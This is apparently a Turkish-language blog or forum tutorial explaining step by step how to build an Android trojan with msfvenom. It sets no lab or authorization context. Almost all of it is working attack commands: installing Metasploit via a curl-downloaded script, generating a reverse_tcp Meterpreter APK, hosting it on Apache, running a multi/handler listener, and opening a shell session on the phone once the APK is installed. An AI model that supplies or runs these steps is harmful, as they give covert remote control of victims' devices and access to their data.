Kali Linux
Metasploit
Merhaba arkadaşlar ben Elfida8, bugün msfvenom ile Trojan nasıl yapılır hep beraber öğreneceğiz. Hadi başlayalım kendi bilgisayarınızdan yaparsanız eğer local ip adresimizi kullanacağız. sunucu üzerinden yaparsanız sunucunun ip adresini kullanacağız .
not : local ağda deneyecekseniz hedef cihazla bilgisayarınız aynı modeme bağlı olmalı
Komut :
ifconfig
eğer tool sisteminizde yüklü değilse :
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
komutunu girerek yükleyebilirsiniz
ardından apkyı oluşturuyoruz
Komut :
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 R > /root/Desktop/android.apk
ip ve port kısımlarını kendinize göre düzenleyin. modemden belirtilen portu açın ve firewallden porta izin verin
masaüstünde apk dosyası oluşacak
ardından apache'yi başlatıyoruz...
Komut :
service apache2 start
Komut :
Revealed content
şimdi metasploit' i açıyoruz...
Komut :
msfconsole
payloada geçiyoruz ve exploiti belirliyoruz
Komut :
set payload android/meterpreter/reverse_tcp
use exploit/multi/handler
seçeneklere giriyoruz
Komut :
show options
ip adresini ve portu ayarlıyoruz
Komut :
set LHOST 192.168.1.34
set LPORT 4444
exploiti başlatıyoruz
Komut :
exploit
şimdi oluşturduğunuz apk yı telefona yüklemelisiniz. telefona yüklediğiniz zaman komut satırı gelecek
şimdi telefon elimizde session numarasını alıp bağlanıyoruz shelle
Komut :
sessions i
sessions –i 3
şimdi bağlantıyı kurduk neler yapabileceğimize bakıyoruz
Komut :
help